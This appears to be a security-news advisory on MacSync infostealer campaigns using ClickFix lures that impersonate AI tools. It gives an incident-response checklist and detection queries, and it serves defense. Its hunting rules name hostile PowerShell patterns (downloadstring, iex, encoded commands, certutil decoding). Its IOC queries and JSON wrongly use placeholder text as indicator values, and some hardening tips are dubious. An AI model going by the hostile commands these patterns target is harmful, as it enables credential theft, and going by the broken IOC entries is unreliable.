← Back to Cybersecurity News Center
Severity
HIGH
CVSS
7.5
Priority
0.412
×
Tip
Pick your view
Analyst for full detail, Executive for the short version.
Analyst
Executive
Executive Summary
Three coordinated ClickFix social-engineering campaigns between November 2025 and February 2026 delivered the MacSync infostealer to macOS users by impersonating AI tools including ChatGPT and Anthropic Claude Code. Targeted users were tricked into manually executing malicious terminal commands, bypassing automated defenses and enabling credential theft and cryptocurrency wallet drainage across Exodus, Atomic, Ledger, and Ledger Live. Organizations with macOS fleets, developer teams using AI tooling, and employees holding cryptocurrency assets face elevated risk from an evolving, shared delivery infrastructure that resists domain-based blocking.
Impact Assessment
CISA KEV Status
Not listed
Threat Severity
HIGH
High severity — prioritize for investigation
TTP Sophistication
HIGH
22 MITRE ATT&CK techniques identified
Detection Difficulty
HIGH
Multiple evasion techniques observed
Target Scope
INFO
macOS (all versions targeted), Windows, Google Chrome, WordPress sites, ChatGPT/OpenAI platforms (impersonated), Claude Code/Anthropic (impersonated), GitHub (impersonated), Cloudflare Pages (infrastructure), Squarespace (infrastructure), Tencent EdgeOne (infrastructure), Exodus Wallet, Atomic Wallet, Ledger Wallet, Ledger Live
Are You Exposed?
⚠
You use products/services from macOS (all versions targeted) → Assess exposure
⚠
22 attack techniques identified — review your detection coverage for these TTPs
✓
Your EDR/XDR detects the listed IOCs and TTPs → Reduced risk
✓
You have incident response procedures for this threat type → Prepared
Business Context
Three coordinated ClickFix social-engineering campaigns between November 2025 and February 2026 delivered the MacSync infostealer to macOS users by impersonating AI tools including ChatGPT and Anthropic Claude Code. Targeted users were tricked into manually executing malicious terminal commands, bypassing automated defenses and enabling credential theft and cryptocurrency wallet drainage across Exodus, Atomic, Ledger, and Ledger Live. Organizations with macOS fleets, developer teams using AI tooling, and employees holding cryptocurrency assets face elevated risk from an evolving, shared delivery infrastructure that resists domain-based blocking.
Technical Analysis
MacSync is a macOS infostealer distributed via ClickFix lures, fake error dialogs and CAPTCHA prompts that instruct users to manually run malicious commands in Terminal.
Three campaign waves (November 2025, December 2025, February 2026) show iterative development; the February iteration added dynamic AppleScript payload generation and in-memory execution to reduce forensic footprint.
No CVE is assigned.
Relevant CWEs: CWE-77 (Command Injection via user-executed terminal commands), CWE-116 (Insufficient Output Encoding), CWE-311 (Missing Encryption for Sensitive Data), CWE-693 (Protection Mechanism Failure), CWE-1021 (Improper Restriction of Rendered UI Layers). MITRE ATT&CK coverage includes T1204.002 (Malicious File execution via user action), T1059.002 (AppleScript), T1059.001 (PowerShell on Windows variants), T1555 /T1555.001 (Credential/Keychain Access), T1539 (Steal Web Session Cookie), T1056.001 (Keylogging), T1055 (Process Injection), T1027 /T1027.010 (Obfuscation/Command Obfuscation), T1036 /T1036.005 (Masquerading), T1140 (Deobfuscate/Decode), T1071.001 (Web Protocol C2), T1102 (Web Service), T1189 (Drive-by Compromise), T1566 /T1566.002 (Phishing), T1583.006 (Acquire Infrastructure: Web Services), T1608.001 (Stage Capabilities), T1176 (Browser Extensions), T1552.001 (Credentials in Files). Payload hosting leverages Cloudflare Pages, Squarespace, and Tencent EdgeOne, complicating domain-based blocking. MacSync shares delivery infrastructure with Alien, Atomic Stealer, StealC, Remcos RAT, CastleRAT, and ModeloRAT. According to multiple security vendor reports (referenced in available T3 intelligence aggregation), at least 20 related campaigns targeting AI and developer tooling have been documented across a six-week window; primary sources include reports from Sophos, Jamf, and Guardio Labs. No patch is applicable, the attack vector is user behavior, not a software vulnerability. Source quality score for this item is 0.54 (T3 sources); verify technical details against primary vendor reports from Sophos, Jamf, and Guardio Labs before acting on specific IOCs.
Action Checklist IR ENRICHED
Triage Priority:
IMMEDIATE
Escalate to executive leadership and external IR firm if any confirmed cryptocurrency wallet drainage is detected, or if investigation reveals compromise of developer API credentials (GitHub, AWS, npm tokens) used in production systems.
1
Step 1, Immediate: Alert macOS users and developer teams to the ClickFix lure pattern; instruct them never to copy-paste Terminal or PowerShell commands from browser dialogs, CAPTCHA prompts, or AI tool error pages.
IR Detail
Preparation
NIST 800-61r3 §2.1 (Preparation phase: awareness and training)
NIST 800-53 AT-2 (Security Awareness and Training)
NIST 800-53 AT-3 (Role-Based Security Training)
CIS 6.5 (Security Awareness Program)
Compensating Control
Send alert email with screenshot examples of ClickFix dialogs impersonating ChatGPT/Claude; include rule: never execute pasted Terminal commands without manual inspection of each line. Post visual checklist on internal wiki (Confluence/Notion) with 'AI tool will never ask for terminal commands' banner. Include this in daily standup for dev teams.
Preserve Evidence
Capture user awareness acknowledgment logs (email read receipts, training platform completion records) to demonstrate timeliness of warning. Document timestamp of alert distribution for incident timeline.
2
Step 2, Detection: Search endpoint logs and EDR telemetry for unexpected AppleScript execution (osascript), Terminal spawned from browser processes, and PowerShell invocations on Windows hosts; flag in-memory payload execution with no associated file drop.
IR Detail
Detection & Analysis
NIST 800-61r3 §3.2 (Detection and Analysis phase: indicators and log review)
NIST 800-53 SI-4 (Information System Monitoring)
NIST 800-53 AU-12 (Audit Generation)
CIS 8.5 (Log Monitoring and Alerting)
Compensating Control
On macOS without EDR: run 'log show --predicate "processImagePath contains[cd] osascript OR processImagePath contains[cd] /usr/bin/ruby" --style syslog' for past 30 days; export to CSV. For Windows: query Event Log 4688 (Process Creation) for powershell.exe spawned from chrome.exe or firefox.exe parent; use wevtutil export to file. Check ~/.bash_history and PowerShell history ($PROFILE logs) for suspicious curl/wget downloads to /tmp or %TEMP%.
Preserve Evidence
Preserve /var/log/system.log and /var/log/unified.log (macOS) with focus on osascript and process spawning events. On Windows: export Security Event Log (4688, 4689 process creation/termination), Application log, and PowerShell Operational log. Capture process command-line arguments in full (not truncated). Snapshot browser cache and download history before analysis.
3
Step 3, Assessment: Inventory macOS endpoints running AI developer tooling (Claude Code, ChatGPT desktop, GitHub CLI); prioritize review for users with access to cryptocurrency wallets (Exodus, Atomic, Ledger Live) or high-value credential stores.
IR Detail
Detection & Analysis
NIST 800-61r3 §3.2.5 (Prioritization of response effort)
NIST 800-53 RA-3 (Risk Assessment)
NIST 800-53 CA-7 (Continuous Monitoring)
CIS 2.1 (Asset Inventory and Management)
Compensating Control
Run 'system_profiler SPApplicationsDataType | grep -i "claude\|chatgpt\|github" > ai_tools_inventory.txt' on each macOS endpoint. Query LDAP or local password manager records to identify users with Exodus/Atomic/Ledger account access; cross-reference with endpoint list. For credential exposure: check ~/.ssh/config, ~/.aws/credentials existence and modification times (stat -f %Sm ~/.aws/credentials). Manually review users in sudo group: dscacheutil -q group -a name sudo.
Preserve Evidence
Capture installed application inventory (Applications folder timestamps, LaunchAgents plist modification times in ~/Library/LaunchAgents). Document user group memberships and sudo eligibility. Preserve cryptocurrency wallet application logs if present (~/.exodus, ~/.atomic folders with wallet.db timestamps). Screenshot credential store locations before access.
4
Step 4, Detection: Add detection rules for ClickFix-pattern clipboard injection and AppleScript payload generation; configure alerts (not blanket blocks) on outbound connections to Cloudflare Pages, Squarespace, and Tencent EdgeOne domains, prioritizing newly registered or unrecognized domains not matching approved business infrastructure.
IR Detail
Detection & Analysis
NIST 800-61r3 §3.4.1 (Detection rules and signatures)
NIST 800-53 SI-4(a) (System monitoring with tools)
NIST 800-53 CA-7(a) (Continuous monitoring program)
CIS 8.6 (Endpoint Detection and Response)
Compensating Control
macOS without EDR: Use Little Snitch (free tier) to log all outbound connections; export daily to CSV and grep for pages.dev, squarespace-cdn, or *.tencent-cloud domains. For AppleScript detection: monitor /var/log/system.log for 'osascript' with stderr redirects or eval patterns; set up cron job 'log stream --predicate "processImagePath contains osascript" --level debug' for real-time capture. Windows: enable PowerShell Script Block Logging (Group Policy: Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging) and monitor for IEX (Invoke-Expression) with URL patterns. Parse firewall logs: grep for connection attempts to known ClickFix infrastructure (maintain updated domain list from threat intel feeds).
Preserve Evidence
Capture DNS query logs (macOS: /var/log/system.log DNS lookups; Windows: DNS client event log 3008-3016) for 7 days pre-alert. Export firewall connection logs showing destination IPs, domains, and timestamps. Preserve clipboard content captures if available (macOS pbpaste logs are not standard; use manual snapshot during investigation). Screenshot osascript process trees with full command-line arguments.
5
Step 5, Communication: Notify affected users and, where cryptocurrency asset access is confirmed, recommend immediate wallet rotation and credential reset; brief leadership on business risk to crypto holdings and developer credential exposure.
IR Detail
Containment
NIST 800-61r3 §3.3 (Containment phase: stakeholder notification) and §2.3.9 (Communication plan)
NIST 800-53 IR-4 (Incident Handling)
NIST 800-53 IR-6 (Incident Reporting)
CIS 6.2 (Incident Management Process)
Compensating Control
Document affected user list with risk tier (crypto access: critical; dev credentials: high; general user: medium). Send tiered notifications: (1) critical-tier users: phone call + email with wallet rotation procedure (new seed phrase generation, funds transfer to new wallet); (2) high-tier users: email with credential reset instructions (password manager reset, API token revocation); (3) management briefing: one-page risk summary including estimated exposure (# users, # wallets, credential types affected). Include timeline: when exposure was possible, when detection occurred, when remediation began.
Preserve Evidence
Preserve all communication logs (email delivery receipts, call records) for compliance audit. Document user acknowledgment of notifications. Capture pre- and post-rotation wallet transaction history (export from blockchain explorers for affected wallet addresses to detect theft). Snapshot credential reset audit logs (password manager, GitHub PAT revocation events, AWS API key rotation timestamps).
6
Step 6, Long-term: Review macOS endpoint security policy to restrict or monitor AppleScript and Terminal execution by non-administrative users; evaluate browser security controls to reduce drive-by exposure (T1189); incorporate ClickFix social-engineering scenarios into security awareness training.
IR Detail
Post-Incident
NIST 800-61r3 §3.4 (Post-Incident Activities: lessons learned) and NIST 800-53 AC-3 (Access Control Policy)
NIST 800-53 AC-2 (Account Management)
NIST 800-53 AC-3 (Access Control)
NIST 800-53 AT-2 (Security Awareness Training)
CIS 5.2 (User and Administrative Account Management)
Compensating Control
macOS without MDM: Deploy LaunchAgent script to log all osascript and Terminal launches to syslog (use launchd plist in /Library/LaunchDaemons); alert on non-admin user execution. Remove Terminal.app and PowerShell from non-admin user launchd PATH (edit /etc/shells, restrict Execute permission on /usr/bin/security, /usr/bin/osascript to admin group). Browser hardening: disable JavaScript execution in plugin contexts (disable Flash, Java plugins); enable browser sandbox restrictions (Safari: Develop > Disable JavaScripting; Chrome policy: Disable 3rd-party cookies, enforce HTTPS-only). Create ClickFix scenario for phishing simulations: mock ChatGPT error page requesting copy-paste command, track click and paste rates monthly, brief teams on results.
Preserve Evidence
Document policy change log (date effective, approval chain). Preserve before/after screenshots of access control settings. Capture training completion metrics (attendance, quiz scores). Archive lessons-learned meeting notes with action items and owners. Establish baseline: measure AppleScript execution by non-admin users weekly for 60 days post-remediation to confirm reduction.
Recovery Guidance
Post-eradication: (1) Require full wallet seed phrase rotation for any user with Exodus/Atomic/Ledger access; validate new wallet addresses via blockchain explorer before funds transfer. (2) Revoke all developer API credentials (GitHub PATs, AWS keys, npm tokens) for affected users and require re-authentication to all production systems. (3) Run 30-day forensic monitoring on affected endpoints for osascript, process spawning, and outbound C2 connections; retire endpoints showing persistent indicators. (4) Conduct post-incident review with dev and security teams within 2 weeks to incorporate ClickFix TTPs into threat model.
Key Forensic Artifacts
macOS: /var/log/system.log, /var/log/unified.log (process execution, osascript events)
macOS: ~/Library/Safari/History.db, ~/Library/Caches/Google/Chrome/Default/Cache (browser history, ClickFix lure domain visits)
macOS: ~/.bash_history, ~/.zsh_history (terminal command history for executed payloads)
Windows: Security Event Log 4688/4689 (process creation, parent-child relationships)
All platforms: DNS query logs, firewall egress logs (outbound connections to Cloudflare Pages, Squarespace, Tencent EdgeOne infrastructure)
macOS: ~/Library/LaunchAgents, ~/Library/LaunchDaemons (persistence mechanisms, scheduled tasks)
Cryptocurrency wallets: blockchain transaction history for wallet addresses, wallet.db modification timestamps (Exodus, Atomic, Ledger)
Detection Guidance
Behavioral indicators: osascript (AppleScript) execution launched from a browser process (Safari, Chrome, Firefox) or spawned unusually from a non-developer context; Terminal.app opening immediately after browser interaction; clipboard content containing base64-encoded strings or curl/bash one-liners followed by user-initiated Terminal paste.
EDR queries: look for process trees where browser PID is parent or grandparent of osascript, sh, bash, or curl.
On Windows: PowerShell launched via browser process with encoded commands (-EncodedCommand flag or base64 argument).
Log sources: macOS Unified Log (process launch events), EDR process telemetry, endpoint DLP for keychain or wallet file access. Network indicators: configure alerts on outbound HTTP/S to Cloudflare Pages domains (*.pages.dev) and Tencent EdgeOne CDN endpoints not matching approved asset inventory; note that Cloudflare Pages hosts legitimate content, so alert on new or unrecognized domains, not the CDN wholesale. File system: watch for new unsigned executables written to user home directories (~/.local, ~/Library, /tmp) following browser sessions. Wallet targeting: monitor for file reads against known wallet paths (~/Library/Application Support/Exodus, Atomic, Ledger Live). Note: specific IOC values (domains, hashes, IPs) are not confirmed in the available T3 sources for this item; pull current IOC lists from Sophos Threat Intelligence, Jamf Threat Labs, and Guardio Labs reports before deploying signature-based blocks.
Indicators of Compromise (4)
Export as
Splunk SPL
KQL
Elastic
Copy All (4)
2 domains
2 urls
Type Value Enrichment Context Conf.
⌘ DOMAIN
Tencent EdgeOne CDN endpoints (specific domains not confirmed in available sources)
VT
US
Identified as payload hosting and redirection infrastructure in campaign description. Specific domains not available from T3 source material — obtain from Sophos, Jamf, or Guardio Labs reporting.
LOW
⌘ DOMAIN
Squarespace-hosted domains (specific values not confirmed in available sources)
VT
US
Used for payload staging and redirection. Specific domains not extractable from available T3 sources — validate against primary vendor IOC feeds.
LOW
🔗 URL
Not confirmed — source quality insufficient for specific URL IOCs
VT
US
No verified payload URLs available from T3 sources. Do not deploy URL-based blocks without confirmation from primary vendor reports.
LOW
🔗 URL
Source-specific IOCs not extractable from available T3 sources
VT
US
Confirmed campaign IOCs (domains, IPs, hashes) were not present in the provided source data. Pull current indicators from MITRE ATT&CK, your threat intelligence platform, and vendor feeds referencing MacSync and ClickFix AI-lure campaigns active November 2025 to February 2026.
LOW
Platform Playbooks
Microsoft Sentinel / Defender
CrowdStrike Falcon
AWS Security
🔒
Microsoft 365 E3
3 log sources
Basic identity + audit. No endpoint advanced hunting. Defender for Endpoint requires separate P1/P2 license.
🛡
Microsoft 365 E5
18 log sources
Full Defender suite: Endpoint P2, Identity, Office 365 P2, Cloud App Security. Advanced hunting across all workloads.
🔍
E5 + Sentinel
27 log sources
All E5 tables + SIEM data (CEF, Syslog, Windows Security Events, Threat Intelligence). Analytics rules, playbooks, workbooks.
IOC Detection Queries (1)
2 URL indicator(s).
KQL Query Preview
Read-only — detection query only
// Threat: MacSync and the ClickFix Ecosystem: How Three Campaigns in Four Months Reveal a
let malicious_urls = dynamic(["Not confirmed — source quality insufficient for specific URL IOCs", "Source-specific IOCs not extractable from available T3 sources"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (malicious_urls)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
MITRE ATT&CK Hunting Queries (7)
Sentinel rule: Encoded command execution
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine matches regex @"[A-Za-z0-9+/]{50,}={0,2}"
or ProcessCommandLine has_any ("-enc ", "-encodedcommand", "frombase64string", "certutil -decode")
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName
| sort by Timestamp desc
Sentinel rule: Process injection / hollowing
KQL Query Preview
Read-only — detection query only
DeviceEvents
| where Timestamp > ago(7d)
| where ActionType in ("CreateRemoteThreadApiCall", "QueueUserApcRemoteApiCall", "WriteToLsassProcessMemory", "NtAllocateVirtualMemoryApiCall", "NtMapViewOfSectionRemoteApiCall")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName, ActionType
| sort by Timestamp desc
Sentinel rule: Suspicious PowerShell command line
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| where ProcessCommandLine has_any ("-enc", "-nop", "bypass", "hidden", "downloadstring", "invoke-expression", "iex", "frombase64", "new-object net.webclient")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Suspicious file execution from downloads
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FolderPath has_any ("\\Downloads\\", "\\Temp\\", "\\AppData\\Local\\Temp\\")
| where FileName endswith_any (".exe", ".scr", ".bat", ".ps1", ".vbs", ".js", ".hta", ".msi")
| where InitiatingProcessFileName in~ ("explorer.exe", "outlook.exe", "chrome.exe", "msedge.exe")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, ProcessCommandLine, AccountName
| sort by Timestamp desc
Sentinel rule: Process name masquerading
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("svchost.exe", "csrss.exe", "lsass.exe", "services.exe", "smss.exe")
| where not (FolderPath startswith "C:\\Windows\\System32" or FolderPath startswith "C:\\Windows\\SysWOW64" or FolderPath startswith "C:\\Windows\\WinSxS")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, ProcessCommandLine, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Unusual C2 communication patterns
KQL Query Preview
Read-only — detection query only
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort in (80, 443, 8080, 8443)
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe", "teams.exe", "outlook.exe", "svchost.exe")
| summarize Connections = count() by DeviceName, RemoteIP, InitiatingProcessFileName
| where Connections > 50
| sort by Connections desc
Sentinel rule: Phishing email delivery
KQL Query Preview
Read-only — detection query only
EmailEvents
| where Timestamp > ago(7d)
| where ThreatTypes has "Phish" or DetectionMethods has "Phish"
| summarize Attachments = make_set(AttachmentCount), Urls = make_set(UrlCount) by NetworkMessageId, Timestamp, SenderFromAddress, RecipientEmailAddress, Subject, DeliveryAction, DeliveryLocation, ThreatTypes
| sort by Timestamp desc
Falcon API IOC Import Payload (2 indicators)
POST to /indicators/entities/iocs/v1 — Weak/benign indicators pre-filtered. Expiration set to 90 days.
Copy JSON
[
{
"type": "domain",
"value": "Tencent EdgeOne CDN endpoints (specific domains not confirmed in available sources)",
"source": "SCC Threat Intel",
"description": "Identified as payload hosting and redirection infrastructure in campaign description. Specific domains not available from T3 source material \u2014 obtain from Sophos, Jamf, or Guardio Labs reporting.",
"severity": "medium",
"action": "no_action",
"platforms": [
"windows",
"mac",
"linux"
],
"applied_globally": true,
"expiration": "2026-07-19T00:00:00Z"
},
{
"type": "domain",
"value": "Squarespace-hosted domains (specific values not confirmed in available sources)",
"source": "SCC Threat Intel",
"description": "Used for payload staging and redirection. Specific domains not extractable from available T3 sources \u2014 validate against primary vendor IOC feeds.",
"severity": "medium",
"action": "no_action",
"platforms": [
"windows",
"mac",
"linux"
],
"applied_globally": true,
"expiration": "2026-07-19T00:00:00Z"
}
]
No hard IOCs available for AWS detection queries (contextual/benign indicators excluded).
Compliance Framework Mappings
T1552.001
T1102
T1189
T1027.010
T1056.001
T1055
+16
AC-6
SC-7
SI-3
SI-4
CM-7
SI-7
+5
MITRE ATT&CK Mapping
T1552.001
Credentials In Files
credential-access
T1102
Web Service
command-and-control
T1189
Drive-by Compromise
initial-access
T1027.010
Command Obfuscation
defense-evasion
T1055
Process Injection
defense-evasion
T1539
Steal Web Session Cookie
credential-access
T1027
Obfuscated Files or Information
defense-evasion
T1036.005
Match Legitimate Resource Name or Location
defense-evasion
T1140
Deobfuscate/Decode Files or Information
defense-evasion
T1036
Masquerading
defense-evasion
T1608.001
Upload Malware
resource-development
T1566
Phishing
initial-access
T1176
Software Extensions
persistence
T1555
Credentials from Password Stores
credential-access
Guidance Disclaimer
